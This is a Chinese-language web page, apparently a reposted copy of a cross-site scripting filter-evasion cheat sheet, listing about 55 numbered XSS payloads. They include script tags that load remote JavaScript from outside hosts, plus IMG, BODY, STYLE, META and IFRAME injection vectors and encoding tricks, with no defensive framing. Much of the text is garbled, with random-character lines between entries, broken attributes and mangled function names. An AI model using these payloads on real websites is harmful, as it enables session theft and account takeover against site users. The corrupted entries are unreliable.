XSS攻击汇总

admin

(1)普通的XSS JavaScript注入
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
7 D" O1 M/ N3 B% m; O) k(99)另类弹框
<q/oncut=alert()>1
* K: O8 k! |  a2 ^  P1 v/ H2 |<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
" l! Y9 b4 g! F<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>
# r! L' A4 ^6 |+ I9 n2 U% a
5 z/ {5 r" `3 H! {9 n+ P(2)IMG标签XSS使用JavaScript命令
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3)IMG标签无分号无引号
: p2 \' h' Z( L, w3 L<IMG SRC=javascript:alert(‘XSS’)>

( ]% h, n& i& s/ M" X( l6 o(4)IMG标签大小写不敏感
( i, q7 Z0 ?1 X5 G. N, r<IMG SRC=JaVaScRiPt:alert(‘XSS’)>

(5)HTML编码(必须有分号)
5 P9 x) P6 I+ r( ]% i: ]( O<IMG SRC=javascript:alert(“XSS”)>

(6)修正缺陷IMG标签
, `+ Y9 F& r, y  r2 V# Y. U2 a<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
* V! _& u3 b" D6 E  x6 u
(7)formCharCode标签(计算器)
; z4 a# a2 L# I) b6 X6 Q<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

9 x& N8 J! |2 ~1 v(8)UTF-8的Unicode编码(计算器)
<IMG SRC=jav..省略..S')>

(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
<IMG SRC=jav..省略..S')>

(10)十六进制编码也是没有分号(计算器)
<IMG SRC=\'#\'" /span>

(11)嵌入式标签,将Javascript分开
: B; ~" y; c, u; {/ s<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>

(12)嵌入式编码标签,将Javascript分开
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
9 E+ I9 _& Q4 @" @; }/ X
# V* P! A1 y2 {' N+ H( I(13)嵌入式换行符
/ y+ r$ ^. d% i  x' D5 A( q<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
) |# B. A# @0 u* X2 J
(14)嵌入式回车
" K6 a5 [" `/ l! a<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
5 ~" X$ y# Z+ u, n
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
<IMG SRC=\'#\'" /span>

(16)解决限制字符(要求同页面)
/ I& s) _: |+ T$ `% O% S0 [/ Z  w<script>z=’document.’</script>
: d+ `1 {' P0 N. v/ _, j& ^<script>z=z+’write(“‘</script>
<script>z=z+’<script’</script>
+ W  c7 H9 \( u' H9 r/ _<script>z=z+’ src=ht’</script>
1 Q5 u, k( ]3 x1 [. @" J! H<script>z=z+’tp://ww’</script>
<script>z=z+’w.shell’</script>
<script>z=z+’.net/1.’</script>
<script>z=z+’js></sc’</script>
<script>z=z+’ript>”)’</script>
8 {9 Z# y8 R$ m3 I, w8 x: Q<script>eval_r(z)</script>
. {& t( w0 f* L
(17)空字符
$ u( W+ P8 K. U8 U. ~perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out

(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
7 _5 [3 ^0 c; x  |& operl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
: A9 H  B/ J4 q
(19)Spaces和meta前的IMG标签
7 n. s: N: \2 P  [4 {' S" x- r<IMG SRC=\'#\'"   javascript:alert(‘XSS’);”>
$ _5 W5 f. ^0 e$ e% N
(20)Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
! m6 U. d* }9 I# D( \& W: ^5 F  W
(21)Non-alpha-non-digit XSS to 2
& h, i3 z! I: W% X<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>

(22)Non-alpha-non-digit XSS to 3
1 v# ~+ z% P  _& `- B% c* l0 [<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>

& D8 k. }- E  a6 c' b8 c& W(23)双开括号
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
: P1 c2 R$ W5 V' ~, A( C. `
(24)无结束脚本标记(仅火狐等浏览器)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25)无结束脚本标记2
<SCRIPT SRC=//3w.org/XSS/xss.js>
2 V5 o2 Z3 a) x
(26)半开的HTML/JavaScript XSS
. q$ T) }4 Q4 j9 [<IMG SRC=\'#\'" /span>
2 }7 c# O+ b2 ^( m  d
(27)双开角括号
; J  R2 k8 P, C: x7 j<iframe src=http://3w.org/XSS.html <
& P7 F. A9 e9 a& W
2 G' t$ w0 J- f) n6 B8 f(28)无单引号 双引号 分号
/ S, m6 @* Y2 r0 I% W7 l2 F3 Z<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29)换码过滤的JavaScript
\”;alert(‘XSS’);//
  F. K: v" k1 L9 z. T* ?" i
  \  {2 x+ [  m! r: G" U8 x(30)结束Title标签
6 z8 M; y' [4 @; ^</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
9 Z9 H0 v# p$ ?4 X/ @
4 v! ]4 I9 d9 A1 v5 F  a1 w: M3 {(31)Input Image
<INPUT SRC=\'#\'" /span>

0 O5 y6 ]1 J5 b- [. [" X. u(32)BODY Image
& e; F7 j, c3 n9 b! X, Z2 P" i6 c- C<BODY BACKGROUND=”javascript:alert(‘XSS’)”>

9 h4 q7 W) u) B+ e(33)BODY标签
<BODY(‘XSS’)>

  X: L0 e- V: {8 c% \- D(34)IMG Dynsrc
. d9 n5 G0 T  p4 r, y# ]6 w<IMG DYNSRC=\'#\'" /span>
, `3 _5 w- V9 D2 A# {! J  j1 k
(35)IMG Lowsrc
<IMG LOWSRC=\'#\'" /span>

(36)BGSOUND
0 ?  X/ M, h" {8 w) ^$ l( I<BGSOUND SRC=\'#\'" /span>

+ O  d* T! ~5 R4 \; L& I(37)STYLE sheet
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
. ^% T: a" r3 u4 v' k
* i# c) W/ `/ W; ]! C6 j9 s- A(38)远程样式表
, Y6 g, n8 u% X) U  K<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>

- m! ~& [  P$ \2 Z5 O- I(39)List-style-image(列表式)
; L. @) T/ R1 T% R2 i: @<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS

(40)IMG VBscript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

% N$ D3 q5 i) j4 q+ b' l( s* R# Q(41)META链接url
3 ?7 _; K6 g9 u% f<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>

6 i7 g. N- a; C8 z: c% v(42)Iframe
6 `' W0 c& ?( D+ m9 R<IFRAME SRC=\'#\'" /IFRAME>

6 A1 P3 @0 A' i" Y, n(43)Frame
& O, C5 p, ^' d: S; p<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
% G/ p, v4 h1 n/ |
(44)Table
. }/ Q1 N# C/ N7 \<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
5 u3 V6 r9 l8 L, p3 @
(45)TD
: e0 e' m' q1 ]7 a' ?; B8 \$ J<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>

/ M9 M* l3 g  S(46)DIV background-image
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
* U6 P9 O5 b, @4 \+ M
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE=”background-image: url(
javascript:alert(‘XSS’))”>
0 J; ^4 x& S) P/ X- i0 g
2 Z) S+ k6 r0 l! w$ Y2 h9 c4 |(48)DIV expression
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
: b. \. R# c4 n/ @& N- P
(49)STYLE属性分拆表达
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>

/ {  [9 F/ S  y(50)匿名STYLE(组成:开角号和一个字母开头)
% c7 E% f  Z; V<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>

- b! o1 o3 H& `* h# o( h* K(51)STYLE background-image
6 R, k- n3 ?1 Y  a9 j<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>

(52)IMG STYLE方式
exppression(alert(“XSS”))’>

* x5 ]' }  j( H: t2 b(53)STYLE background
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
; J+ {- }) E: O# r. [# b* [
(54)BASE
<BASE HREF=”javascript:alert(‘XSS’);//”>
! F% N: q" k/ ?7 e7 Q
9 N2 _1 g& y6 E. X1 Z(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>
$ x" h- r; v8 |$ D, n, y